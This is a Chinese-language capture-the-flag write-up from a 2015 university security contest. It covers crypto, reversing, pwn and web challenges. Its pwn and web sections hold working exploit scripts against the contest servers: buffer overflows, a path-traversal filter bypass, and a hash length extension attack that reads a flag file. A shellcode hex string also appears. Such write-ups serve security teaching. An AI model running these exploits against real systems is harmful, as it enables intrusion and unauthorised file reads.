网络空间安全实验班选拔赛WRITE-UP

网络空间安全实验班选拔赛WRITE-UP

@(writeup)[Th1nk|Bigtang|2015-06-07]

###1# FirstBlood 96/680 20

修改口号为FirstBl00d,抢第一个flag~~~

右键查看源码,发现提供了修改口号的接口

<div id="myInfo" class="reveal-modal" style="display: none;">
    <h2>我的信息</h2>
    <blockquote>
      <p>队伍名称:测试用户</p>
      <p>口号:FirstBl00d</p>
      <!-- index.php/user/updatevoice?voice= -->
      <p>分数: 300</p>
      <p>已找到的FLAG: 3</p>
    </blockquote>
    <a class="close-reveal-modal">&#215;</a>
</div>

访问 http://ctf.xidian.edu.cn/index.php/user/updatevoice?voice=FirstBl00d 即可

###2# 十六进制字符串 137/655 20

这是一个十六进制的字符串,解开后就知道flag在哪里了
666c61675f69735f686572657b3265346231303234613763386
3353432373139633637613064666333663432302e7068707d

"666c61675f69735f686572657b32653462313032346137633863353432373139633637613064666333663432302e7068707d".decode("hex")
'flag_is_here{2e4b1024a7c8c542719c67a0dfc3f420.php}'

访问 http://ctf.xidian.edu.cn:8888/crypto/hex/2e4b1024a7c8c542719c67a0dfc3f420.php

###3# AES解密 111/317 25

这是一个AES加密的字符串,密钥已经给你了。解开后就知道flag在哪里了 Ciphertext:U2FsdGVkX19k/4EAL3YRk/vhS1M1IynAj+M+VNj2I7l3Li2Mlr7
/OQboOf5akTBdbDTLq4sVwsBx4U7XGgj0ZgUtJyR0zOB7o7gb6b9a4ao=
Key:bigtang

高级加密标准AES在线工具
flag_is_here{64316e20808e3596d7ea71a6ece5c6b3.php}

4# caesar 82/156 25

mshn_pz_olyl{432842233j8m1il4028432151l1h57ml.wow}

CAESAR Shift Code
flag_is_here{432842233c8f1be4028432151e1a57fe.php}

###5# DES解密 77/149 25

Ciphertext:683b32b9f57025220869431027e4946b044a900c5d3fb01e8
6c68f835ff58f02202eb5b42e083f2bce4768274a592720f5337ebe36b70e7e
key:xdsecsec

DES ECB hex
DES解密
flag is in 5371c64364510f6aad8519743f185c75.php

###7# 一段被加密了的js 62/117 25

http://ctf.xidian.edu.cn:8888/crypto/js/js.php
Chrome浏览器,打开开发者工具,运行可得
"flag_is_here{c88e4f8865b23a793bab1e3aa2f1153b.php}"

###10# 你抓住了么 21/121 35

http://ctf.xidian.edu.cn:8888/web/js/index.php

index.html中有段js控制跳转,关闭javascript,访问index.html
flag:6d06d2ce7c25c4c2cbcc09c03ef9ab37.php

###15# re0 8/44 50

// bigtang
#include <stdio.h>
#include <string.h>

int main()
{
    char enc[] = "1bb2e9807bece13cccf247adbcc6a194";
    char text[64];
    int i;
    int flag = 0;

    printf("SO EASY\n");
    printf("input:");
    scanf("%s",text);
    if (strlen(text) != 32)
    {
        printf("Wrong~~~!\n");
        return 1;
    }
    
    if (strncmp(text,enc,32) == 0)
    {
        printf("flag is CTF{%s}\n",text);
    }
    else
    {
        printf("Try again~!\n");
    }

    return 0;
}

ida反编译main函数
CTF{1bb2e9807bece13cccf247adbcc6a194}

22# 汇编指令 5/13 60

写出下面汇编指令对应的机器码,以十六进制形式给出(31c0...)

http://shell-storm.org/shellcode/files/shellcode-806.php
31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05

24# pwn0 2/5 80

溢出第0题
nc ctf.xidian.edu.cn 23333

#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

void welcome()
{
    write(STDOUT_FILENO,"Welcome to XDSEC's login system!\n",34);
    write(STDOUT_FILENO,"Please input your name and I will check it!\n",44);
}

void get_flag()
{
        int fd,ret;
        char buffer[40];
        fd = open("flag.txt",O_RDONLY);
        ret = read(fd,buffer,40);
        write(STDOUT_FILENO,buffer,strlen(buffer));

}

void vuln()
{
    int auth = 0;
        char name[64];
        char text[] = "bigtang";
        
        write(STDOUT_FILENO,"Show me :",9);
        read(STDIN_FILENO,name,100);

        if (strncmp(name,text,7)==0)
        {
                if (auth == 0x61626364)
                {
                        get_flag();
                }
        }
        else
        {
            write(STDOUT_FILENO,"Who are you?\n",13);
        }
}

int main()
{
    welcome();
    vuln();
    return 0;
}

临接变量覆盖,exp如下

from zio import *

host = "ctf.xidian.edu.cn"
port = 23333
io = zio((host,port))
io.read_until("Show me :")
io.writeline("bigtang"+'1'*69 + "dcba")
io.interact()

key is 91c96cafbe59b36feca8bf48fe4df709

27# re1 6/42 100

#include <stdio.h>
#include <string.h>

int main()
{
    char enc[] = {0x37,0x39,0x33,0x35,0x62,0x64,0x3f,0x64,0x6b,0x3f,0x33,0x68,0x3d,0x38,0x39,0x38,0x75,0x25,0x76,0x27,0x76,0x74,0x26,0x76,0x7e,0x7d,0x2e,0x7d,0x78,0x2e,0x2c,0x7b};
    char text[64];
    int i;
    int flag = 0;

    printf("JUST REVERSE ME!\n");
    printf("input:");
    scanf("%s",text);
    if (strlen(text) != 32)
    {
        printf("Wrong~~~!");
        return 1;
    }
    
    for (i=0;i<32;i++)
    {
        if ((text[i] ^ i) == enc[i])
        {
            flag ++;
        }
        else
        {
            printf("Wrong~~~!");
            return 1;
        }
    }
    
    if (flag == 32)
    {
        printf("flag is CTF{%s}",text);
    }
    return 0;
}

异或加密,没啥说的,看代码吧

28# Web.py1 7/10 100

过滤可绕过

def GET(self, filepath):
        if filepath.find("flag")>-1: #禁止flag
            return "Goodbye Hackers"
        #防止跨目录读取
        filepath = filepath.replace("../","") #过滤../
        try:
            with open("./uploads/%s" % filepath, "rb") as f:
                content = f.read()
            return content
        except:
            return web.notfound("Sorry, the file you were looking for was not found.")

exp

## bigtang
from requests import get

def get_flag():
        url = "http://ctf.xidian.edu.cn:8080/uploads/"
        payload = url + ".../...//.../...//fla../g.txt"
        flag = get(payload).content
        return flag

if __name__ == "__main__":
        flag = get_flag()
        print "[*] flag :" + flag

30# pwn1 1/3 150

栈溢出,怕时间不够,读取文件的shellcode也写在里面了。只需覆盖返回地址为读文件函数的地址。

## bigtang ##
from zio import *

host = "ctf.xidian.edu.cn"
port = 6666
io = zio((host,port))
io.read_until("Please tell me your lucky number:")
io.writeline("100")

read_flag = 0x40067e
io.read_until("Please say something about your story:")
io.writeline("1"*0x58+l64(read_flag))
io.interact()

31# re2 5/21 150

看代码

int gogogo(char username[],char password[])
{
    if (strncmp(password,"e38567689dcc9d2d",16)!=0)
    {
        return 1;
    }
    if (username[0] != password[17])
    {
        return 1;
    }
    if ((username[4] != password[31]) || (username[4] != password[29]) || (username[4] != password[19]))
    {
        return 1;
    }
    if ((password[18] != '0') || (password[27] != '0'))
    {
        return 1;
    }
    if ((password[20] != '4') || (password[25] != '4') || (password[28] != '4')  || (password[30] != '4'))
    {
        return 1;
    }
    if (password[16] != '7')
    {
        return 1;
    }
    if (password[21] != '3')
    {
        return 1;
    }
    if ((password[22] != '1') || (password[26] != '1'))
    {
        return 1;
    }
    if (password[23] != '6')
    {
        return 1;
    }
    if (password[24] != '5')
    {
        return 1;
    }
     
    return 0;
}

用od好好调试
CTF{e38567689dcc9d2d7b0a431654104a4a}

34# Web.py2 200

哈希长度扩展攻击

## bigtang
from hashpumpy import hashpump
from base64 import b64encode,b64decode
from requests import get,Session


def get_flag():
        headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Encoding': 'gzip, deflate, compress',
                'Accept-Language': 'en-us;q=0.5,en;q=0.3',
                'Cache-Control': 'max-age=0',
                'Connection': 'keep-alive',
                'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}

        s = Session()
        s.headers.update(headers)
        url = "http://107.170.204.123:8088/read/index"
        link =  s.get(url).content
        filepath = link[link.index("filepath=")+9:link.index("&")]
        mac = link[link.index("mac=")+4:link.index("Link")-2]
        print "[*] filepath: " + b64decode(filepath)
        print "[*] mac     : " + mac

        new_mac = hashpump(mac,"test.txt","////////../../../../../../home/webpy2/flag.txt",16)
        print "[*] payload : " + b64encode(new_mac[1])
        print "[*] new_mac : " + new_mac[0]

        new_url = url + "?filepath=" + b64encode(new_mac[1]) + "&mac=" + new_mac[0]
        flag = s.get(new_url).content
        return flag

if __name__ == "__main__":
        flag = get_flag()
        print "[+] flag    : " + flag

[+] flag : Flag is in http://ctf.xidian.edu.cn:8888/web/webpy2/811cf8a2a72781ef04d50400d9cfd276.php

tagged by none  

Comment Closed.

© 2014 ::L Team::